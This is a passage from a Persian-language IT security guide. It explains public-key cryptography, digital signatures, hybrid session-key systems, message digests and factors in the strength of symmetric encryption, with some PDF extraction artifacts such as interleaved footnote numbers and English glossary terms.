ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ ،ﻛﻪ ﺍﻳﻦ ﺑﺮﺍﻱ Nﻛﺎﺭﺑﺮ ﻣﺘﻔﺎﻭﺕ ﻣـﺴﺘﻠﺰﻡ (N2 - N) / 2ﻛﻠﻴـﺪ ﻣـﻲﺷـﻮﺩ .ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺗﻌـﺪﺍﺩ
ﻛﺎﺭﺑﺮﺍﻥ ،ﺍﻳﻦ ﻋﺪﺩ ﺑﺴﺮﻋﺖ ﻏﻴﺮﻗﺎﺑﻞ ﻛﻨﺘﺮﻝ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻧﺎﻣﺘﻘﺎﺭﻥ
ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻳﻚ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﻛﻠﻴﺪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ .ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ
ﻻ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻛﻠﻴﺪ ﺭﻣـﺰ ﻫﻤﮕـﺎﻧﻲ ٧٧ﻣـﻲﻧﺎﻣﻨـﺪ،
ﻳﻚ ﺩﺳﺘﺔ ﻣﻬﻢ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻧﺎﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ .ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻣﻌﻤﻮ ﹰ
ﭼﻮﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺧﺪﺷﻪﺍﻱ ﺑﻪ ﺳﺮﻱ ﺑﻮﺩﻥ ﭘﻴﺎﻡ ﻳﺎ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭﺍﺭﺩ ﺷﻮﺩ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻫﻤﮕـﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ .ﻛﻠﻴـﺪ
ﻻ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ" ﻳﺎ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺳﺮﻱ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ.
ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺑﺎ ﻣﺠﺰﺍ ﻛﺮﺩﻥ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ،ﻣﺸﻜﻼﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﮐﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﺗﺎ ﺣﺪﻭﺩ
ﺯﻳﺎﺩﻱ ﺣﻞ ﻣﻲﻛﻨﻨﺪ .ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ ،ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺑﻄﻮﺭ ﻧﺴﺒﻲ ﻛﺎﺭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻥ
ﻣﻲﻛﻨﺪ .ﻃﺒﻴﻌﺘﹰﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﻨـﺪ ﻛﻠﻴـﺪﻫﺎﻱ ﻫﻤﮕـﺎﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻳـﺎ
ﮐﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﺎﺷﺪ .ﺁﻧﮕﺎﻩ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﻳﻚ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ،ﺗﻨﻬﺎ ﻛﺎﺭﻱ ﻛـﻪ ﺑﺎﻳـﺪ
ﺍﻧﺠﺎﻡ ﺩﻫﻴﻢ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻓﺮﺩ ﺭﺍ ﺑﻴﺎﺑﻴﻢ ،ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﻢ ،ﻭ ﺳﭙﺲ ﺑﺮﺍﻳﺶ ﺍﺭﺳـﺎﻝ ﻧﻤـﺎﻳﻴﻢ .ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﺧﻮﺏ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺗﻨﻬﺎ ﻛﺴﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧـﺼﻮﺻﻲ ﻣﺘﻨـﺎﻇﺮ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ.
ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺗﻨﻬﺎ ﭼﻴﺰﻱ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺩﺭ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻴﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﺧﻮﺩﻣﺎﻥ ﺍﺳﺖ.
ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﮐﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ .ﻳﻚ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣﺎﻧﻨـﺪ ﻳـﻚ ﺍﻣـﻀﺎﻱ
ﺣﻘﻴﻘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﻳﻚ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﺭﻭﺩ .ﺩﺭ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻣﺜﻞ ﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺍﻣـﻀﺎ
ﻛﻨﻴﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺯ ﻧﻮﺷﺘﻪﺷﺪﻥ ﺁﻥ ﺗﻮﺳﻂ ﺧﻮﺩ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻴﺪ؛ ﻭ ﻣﺎﻧﻨﺪ ﺍﻣﻀﺎﻱ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﻣﻮﺍﻓﻘﻨﺎﻣﻪ ﻓﺮﻭﺵ ﻣـﻲ-
ﺗﻮﺍﻧﻴﺪ ﻳﻚ ﺳﻨﺪ ﻣﻌﺎﻣﻼﺗﻲ ﺭﺍ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﻀﺎ ﻛﻨﻴﺪ ﺗﺎ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻛـﻪ ﻣﺎﻳﻠﻴـﺪ ﻛـﺎﻻﻳﻲ ﺭﺍ ﺳـﻔﺎﺭﺵ ﺩﺍﺩﻩ ﻳـﺎ ﺑﻔﺮﻭﺷـﻴﺪ .ﺩﺭ
Public Key Algorithms
Block Algorithms
Stream Algorithms
Public Key
74
75
76
77
٢٩٣
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ،ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﻭ ﻟﺬﺍ ﺳﺎﻳﺮﻳﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﻨﺎﻇﺮ ﺍﺯ ﺻﺤﺖ ﺍﻣﻀﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ.
ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﺮﻫﺰﻳﻨﻪ ﻫﺴﺘﻨﺪ .ﺩﺭ ﻋﻤﻞ ،ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕـﺎﻧﻲ ﺑـﻪ
ﻗﺪﺭﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ۱۰۰۰ﺑﺮﺍﺑﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻌﺎﺩﻝ ﺧﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻭ ﻧﻴـﺰ
ﺍﺯ ﺳﺮﻋﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ ،ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺩﺭ ﻭﺍﻗـﻊ ﺍﺯ ﻳـﻚ ﺗﺮﻛﻴـﺐ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ:
ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻋﻤﻮﻣﻲ /ﺧﺼﻮﺻﻲ ﺩﻭﮔﺎﻧﻪ
٧٨
ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻛﻪ ﻛﻨﺪﺗﺮ ﺍﺳﺖ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰ ﺗﺼﺎﺩﻓﻲ ﺟﻠﺴﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ ،ﻛـﻪ
ﺑﻌﻨﻮﺍﻥ ﻣﺒﻨﺎﻱ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﻣﺘﻘﺎﺭﻥ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﺩ )ﻳﻚ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺩﻭﺭﻩ" ﺗﻨﻬﺎ ﺑﺮﺍﻱ ﻳﻚ ﺩﻭﺭﻩ ﻭﺍﺣﺪ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺑﻜـﺎﺭ
ﻣﻲﺭﻭﺩ ﻭ ﭘﺲ ﺍﺯ ﺁﻥ ﻛﻨﺎﺭ ﮔﺬﺍﺷﺘﻪ ﻣﻲﺷﻮﺩ( .ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﭘﻴﺎﺩﻩﺳﺎﺯﻱﻫﺎﻱ ﻋﻤﻠﻲ ﺭﻣﺰﻧﮕﺎﺭﻱﻫﺎﻱ ﻫﻤﮕﺎﻧﻲ ﺍﺯ ﻧـﻮﻉ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺩﻭﮔﺎﻧـﻪ ﻫـﺴﺘﻨﺪ.
ﻧﻜﺘﻪ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﺩﺳﺘﺔ ﺧﺎﺻﻲ ﺍﺯ ﺗﻮﺍﺑﻊ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻴﺸﻪ ﺑﺎ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕـﺎﻧﻲ ﺍﺯ ﺁﻧﻬـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ .ﺍﻳـﻦ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺍﺻﺎﻟﺘﹰﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﻴﺴﺘﻨﺪ ،ﺑﻠﻜﻪ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ "ﺍﺛﺮ ﺍﻧﮕﺸﺖ" ﺍﺯ ﻳﻚ ﻓﺎﻳﻞ ﻳﺎ ﻛﻠﻴﺪ ﺭﻣﺰ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ:
ﺗﻮﺍﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ
ﻳﻚ ﺗﺎﺑﻊ ﺧﻼﺻﻪﭘﻴﺎﻡ ﻳﻚ ﺍﻟﮕﻮﻱ ﺑﻪ ﻇﺎﻫﺮ ﺗﺼﺎﺩﻓﻲ ﺍﺯ ﺑﻴﺘﻬﺎ ﺑﺮﺍﻱ ﻫﺮ ﻭﺭﻭﺩﻱ ﺗﻮﻟﻴﺪ ﻣﻲﻛﻨﺪ .ﻣﻘﺪﺍﺭ ﺧﻼﺻﻪ ﺑﻪ ﻧﺤﻮﻱ ﻣﺤﺎﺳﺒﻪ ﻣـﻲﺷـﻮﺩ
ﻛﻪ ﻳﺎﻓﺘﻦ ﻳﻚ ﻭﺭﻭﺩﻱ ﻛﻪ ﺩﻗﻴﻘﹰﺎ ﻳﻚ ﺧﻼﺻﺔ ﻣﻮﺭﺩ ﻧﻈﺮ ﺭﺍ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﺍﻣﻜﺎﻧﭙﺬﻳﺮ ﻧﺒﺎﺷﺪ .ﺧﻼﺻﻪﭘﻴﺎﻣﻬﺎ ﻏﺎﻟﺒﹰﺎ "ﺍﺛﺮ ﺍﻧﮕﺸﺖ
ﻓﺎﻳﻠﻬﺎ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ .ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛﻪ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﻧﺠﺎﻡ ﻣﻲﺩﻫﻨﺪ ،ﺑﻪ ﺟﺎﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺍﺻﻠﻲ ﻓﺎﻳﻞ ،ﺧﻼﺻﻪﭘﻴﺎﻡ ﺩﺍﺩﻩﻫـﺎ ﺭﺍ
ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ.
ﻗﺪﺭﺕ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﻟﮕﻮﺭﻳﺘﻢﻫﺎﻱ ﻣﺘﻘﺎﺭﻥ
ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺨﺘﻠﻒ ﺍﺯ ﻧﻈﺮ ﻗﺪﺭﺕ ﺑﺎ ﻳﻜﺪﻳﮕﺮ ﺑﺮﺍﺑﺮ ﻧﻴﺴﺘﻨﺪ .ﺑﻌﻀﻲ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺯ ﻧﻈﺮ ﺣﻔﺎﻇﺖ ﺍﺯ ﺩﺍﺩﻩﻫﺎ ﭼﻨﺪﺍﻥ ﺧـﻮﺏ ﻋﻤـﻞ
ﻧﻤﻲﻛﻨﻨﺪ ﻭ ﺍﺟﺎﺯﻩ ﻣﻲﺩﻫﻨﺪ ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴﺪ ﻻﺯﻡ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﻧﺪ .ﺑﻌﻀﻲ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺣﺘﻲ ﺩﺭ ﻣﻘﺎﺑـﻞ
ﻗﻮﻳﺘﺮﻳﻦ ﺣﻤﻠﻪﻫﺎ ﻫﻢ ﺑﺴﻴﺎﺭ ﻣﻘﺎﻭﻡ ﻫﺴﺘﻨﺪ .ﻗﺎﺑﻠﻴﺖ ﺣﻔﺎﻇﺖ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺣﻤﻠﻪ ﺍﺳﺘﺤﻜﺎﻡ ٧٩ﻧـﺎﻡ ﺩﺍﺭﺩ .ﺍﺳـﺘﺤﻜﺎﻡ ﺑـﻪ
ﻋﻮﺍﻣﻞ ﺯﻳﺎﺩﻱ ﺑﺴﺘﮕﻲ ﺩﺍﺭﺩ ﺍﺯ ﺟﻤﻠﻪ:
•
•
•
•
•
Session Random Key
Strength
Known Plaintext Attack
78
79
80
ﺑﺨﺶ ﭘﻨﺠﻢ
•
ﺳﺮﻱ ﺑﻮﺩﻥ ﻛﻠﻴﺪ ﺭﻣﺰ؛
ّ
ﻻ ﭘﻴﺪﺍ ﻛﺮﺩﻥ ﻳـﺎ ﺣـﺪﺱ ﺯﺩﻥ
ﻣﺸﻜﻞ ﺑﻮﺩﻥ ﺍﻣﻜﺎﻥ ﺣﺪﺱ ﻛﻠﻴﺪ ﻳﺎ ﺍﻣﻜﺎﻥ ﺁﺯﻣﺎﻳﺶ ﻫﻤﺔ ﻛﻠﻴﺪﻫﺎﻱ ﻣﻤﻜﻦ )ﺟﺴﺘﺠﻮﻱ ﻛﻠﻴﺪ ﺭﻣﺰ( .ﻣﻌﻤﻮ ﹰ
ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰ ﻃﻮﻻﻧﻲﺗﺮ ﻣﺸﻜﻠﺘﺮ ﺍﺳﺖ؛
ﺩﺷﻮﺍﺭ ﺑﻮﺩﻥ ﻣﻌﻜﻮﺱ ﻛﺮﺩﻥ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ )ﺷﻜﺴﺘﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ(؛
ﻋﺪﻡ ﻭﺟﻮﺩ ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ ،ﻳﺎ ﺷﺮﺍﻳﻂ ﺩﻳﮕﺮﻱ ﻛﻪ ﺑﺎﻋﺚ ﺷﻮﻧﺪ ﻳﻚ ﻓﺎﻳﻞ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺍﻧﺴﺘﻦ ﻛﻠﻴـﺪ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺁﺳـﺎﻧﺘﺮ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﻮﺩ؛
ﻧﺎﻣﻤﮑﻦ ﺑﻮﺩﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻳﻚ ﭘﻴﺎﻡ ﻛﻪ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩ ،ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺑﺪﺍﻧﻴﺪ ﭼﮕﻮﻧﻪ ﺑﺨﺸﻲ ﺍﺯ ﺁﻥ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻣﻲﺷـﻮﺩ
)ﻛﻪ ﺣﻤﻠﻪ ﻣﺘﻦ ﺳﺎﺩﺓ ﺷﻨﺎﺧﺘﻪ ﺷﺪﻩ ٨٠ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ(؛ ﻭ
ﻼ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﮔﺮ ﻫﻤﺔ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﺷـﺪﻩ ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ
ﺧﺼﻮﺻﻴﺎﺕ "ﻣﺘﻦ ﺳﺎﺩﻩ" ﻭ ﺩﺍﻧﺶ ﻳﻚ ﻣﻬﺎﺟﻢ ﺑﻪ ﺁﻥ ﺧﺼﻮﺻﻴﺎﺕ ،ﻣﺜ ﹰ
ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺎ ﻳﻚ ﻗﻄﻌﻪ ﺷﻨﺎﺧﺘﻪﺷﺪﺓ "ﻣﺘﻦﺳﺎﺩﻩ" ﺷﺮﻭﻉ ﺷﻮﺩ ﻳﺎ ﺧﺎﺗﻤﻪ ﻳﺎﺑﺪ ،ﺁﻥ ﺳﻴﺴﺘﻢ ﻧﺴﺒﺖ ﺑﻪ ﺣﻤﻠﻪ ﺁﺳﻴﺐﭘﺬﻳﺮ ﺑﺎﺷﺪ.
٢٩٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﺭ ﺣﺎﻟﺖ ﻛﻠﻲ ﺍﺳﺘﺤﻜﺎﻡ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺛﺒﺎﺕ ﻧﻤﻲﺷﻮﺩ؛ ﺑﻠﻜﻪ ﺗﻨﻬﺎ ﺭﺩ ﻣﻲﺷﻮﺩ .ﻭﻗﺘﻲ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺟﺪﻳﺪ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ ،ﻣﺒﺘﻜـﺮ
ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﻴﺸﻪ ﺑﺮ ﺍﻳﻦ ﺑﺎﻭﺭ ﺍﺳﺖ ﻛﻪ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺗﻀﻤﻴﻦﻛﻨﻨﺪﺓ ﺍﻣﻨﻴﺖ ﻛﺎﻣﻞ ﺍﺳﺖ -ﻳﻌﻨﻲ ﻣﺒﺘﻜﺮ ﻣﻌﺘﻘـﺪ ﺍﺳـﺖ ﻛـﻪ ﺭﺍﻫـﻲ ﺑـﺮﺍﻱ
ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﺪﻭﻥ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﺩﺍﺷﺘﻦ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺮﺑﻮﻃﻪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ،ﭼﺮﺍ ﻛﻪ ﺍﮔﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺩﺍﺭﺍﻱ ﻳـﻚ ﻧﻘـﺺ ﺷـﻨﺎﺧﺘﻪ ﺷـﺪﻩ
ﻻ ﻣﺒﺘﻜﺮ ﺩﺭ ﻭﺣﻠﻪ ﺍﻭﻝ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ )ﻳﺎ ﺣﺪﺍﻗﻞ ﺑﺎ ﺧﻴﺎﻝ ﺁﺳﻮﺩﻩ ﺁﻧﺮﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻧﻤﻲﻛﻨﺪ(
ﺑﺎﺷﺪ ،ﺍﺻﻮ ﹰ
ﺑﻌﻨﻮﺍﻥ ﺑﺨﺸﻲ ﺍﺯ ﺑﺮﺭﺳﻲ ﺍﺳﺘﺤﻜﺎﻡ ﻳﻚ ﺍﻟﮕﻮﺭﻳﺘﻢ ،ﻳﻚ ﺭﻳﺎﺿﻴﺪﺍﻥ ﻣﻲﺗﻮﺍﻧﺪ ﻧﺸﺎﻥ ﺩﻫﺪ ﻛﻪ ﺍﻟﮕﻮﺭﺗﻴﻢ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﻧـﻮﺍﻉ ﺧﺎﺻـﻲ ﺍﺯ ﺣﻤـﻼﺕ
ﻼ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﻧﻘﺎﻳﺺ ﺳﺎﻳﺮ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﻜﺎﺭ ﺭﻓﺘﻪﺍﻧﺪ ﻣﻘﺎﻭﻡ ﺍﺳﺖ .ﻣﺘﺄﺳﻔﺎﻧﻪ ﺣﺘﻲ ﺍﻟﮕﻮﺭﻳﺘﻤﻲ ﻛـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻫﻤـﺔ ﺣﻤـﻼﺕ
ﻛﻪ ﻗﺒ ﹰ
